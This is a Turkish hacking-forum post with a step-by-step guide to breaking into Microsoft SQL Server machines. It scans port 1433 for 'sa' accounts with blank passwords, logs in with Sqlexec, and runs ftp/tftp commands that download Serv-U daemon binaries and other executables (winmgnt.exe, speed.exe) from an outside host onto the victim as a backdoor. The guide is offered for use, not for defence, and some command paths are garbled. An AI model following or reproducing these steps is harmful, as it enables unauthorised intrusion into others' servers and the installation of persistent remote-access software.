SQLServer HACKLeme

wild_jackal

Yeni üye
22 Mar 2006
14
1
SQLServer HACKLeme
Gerekli Materyaller:

SQL Scanner

SERV-U

Sqlexec

TFTP

Eveet Bu Yukarda Yazdiklarim Nedir Ne Ise Yarar Birazdan Görecegiz.

a) Ilk Önce Serv-u Yu Ayarlayip Portunu 4 Rakamli Konuma Getirecegiz. Örnek: 3275

b) SQL Scan Result Örnegin Su Sekilde Görünür: 127.0.0.1 Found Mssql account: sa/[Null]

Burdaki Gördügümüz "sa" Username "[Null]" ise Password\'dur. "[Null]" Bu Password Belirtilmemis Demektir.

c) Sqlexec\'i Aynen Bu Sekilde Ayarliyoruz. Username: sa Password: [Null]

d) Serv-u Icin Bir Path Yani Dizin Buluyoruz.

e) TFTP\'yi Kendi Bilgisayarimizda Calistiriyoruz.

f) SQL\'de Normal DOS Komutlari Gecerlidir. Dolayisiyla DOS Komutlariyla Calisacagiz.

g) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.ini c:Buraya Path serv-u.ini << Yazacagiz. Yani Serv-u.ini nin Yolunu Yazacagiz. Bu Komutla Serv-u.ini\'yi Aliyoruz.

h) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.exe c:Buraya Path serv-u.exe << Yazacagiz. Yani Serv-u.exe nin Yolunu Yazacagiz.

i) Sonra DirServ-u.exe Yaziyoruz. Bu Komutla Serv-u.exe\'mizi Calistiririz.

1) Scan Ve RecHecken:

Ilk Önce SQL Server Bulabilmemiz Icin SQL Server Scanner Bulmamiz Gerek. Bunu "Sfind.exe" Adli Programla Yapabiliriz. SQL Server\'lerin Port\'u 1433\'dür. Bununla Beraber Scan Yapiyoruz.

Scan Olayi Bittikten Sonra Scanner\'imiz Bize Bir Yigin IP Adresi Verecektir. Sifre Bulabilmemiz Icin Bu IP Adreslerini RecHecken Yapmamiz Lazim. Su Sekilde:

"SQLLHF.exe" Adli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Sonra "Check_1.bat" Isimli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Ayni Sekilde "Sfind.exe" Adli Scanner\'imize Ait Olan "Sfind.txt" Dosyasida C Sürücüsünde Olmalidir.

Sonra DOS\'u Aciyoruz Ve "Check_1.bat Dosyasini Calistiriyoruz. O Otomatik Olarak Sfind.txt\'deki IP\'lere Ping Atacak. Bu Islem Yaklasik 5 Dakika Sürecektir.

Bu Arada Biz, Koydugumuz Cay Suyuna Bakiyoruz Ve Cayimizi Demliyoruz. Cayimizi Yudumlayarak Islemlerimize Devam Ediyoruz Smiley)))

PING Olayi Bitti. Simdi Sonuclara Bakiyoruz. Örnegin: "Checking 127.xxx.xx.xx ::: Password not guessed" Su Sekilde Bir Yazi Varsa Bu Serveri Hackleyemeyiz. Ama Su Sekilde Olursa: "Checking 127.xxx.xx.xx ::: Password is blank!! <---- WARNING!" Iste O Zaman Hackleyebiliriz Demektir Smiley

2) Connecting Yani Hacking

"Sqlexec.exe" Adli Tool\'umuzu Calistiriyoruz. Buldugumuz IP Adresini Giriyoruz. Username\'yi Her Halukarda sa Olarak Ve Password\'u Blank Olarak Giriyoruz.

Simdi Asagiya "dir c:" Komutunu Veriyoruz. Veeee SQL Server\'in C Sürücüsüne Girmis Oluyoruz Smiley))

Serv-u Dosyalarini TFTP\'ye Yüklemek Icin Su Komutlari Verebiliriz (IP Adresini Örnek Olarak Veriyorum):

tftp.exe -i 127.0.0.1 GET Servudaemon.exe c:server.exe
tftp.exe -i 127.0.0.1 GET TzoLibr.dll c: TzoLibr.dll
tftp.exe -i 127.0.0.1 GET winmgnt.exe c:winmgnt.exe
tftp.exe -i 127.0.0.1 GET httpodbc.dll c:httpodbc.dll
tftp.exe -i 127.0.0.1 GET ServUDaemon.ini c:ServUDaemon.ini
tftp.exe -i 127.0.0.1 GET speed.exe c:windowssystem32speed.exe ? ?
tftp.exe -i 127.0.0.1 GET 1.txt c:windowssystem321.txt )____ Huh??
tftp.exe -i 127.0.0.1 GET 2.txt c:windowssystem322.txt )

ALINTIDIR...!
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.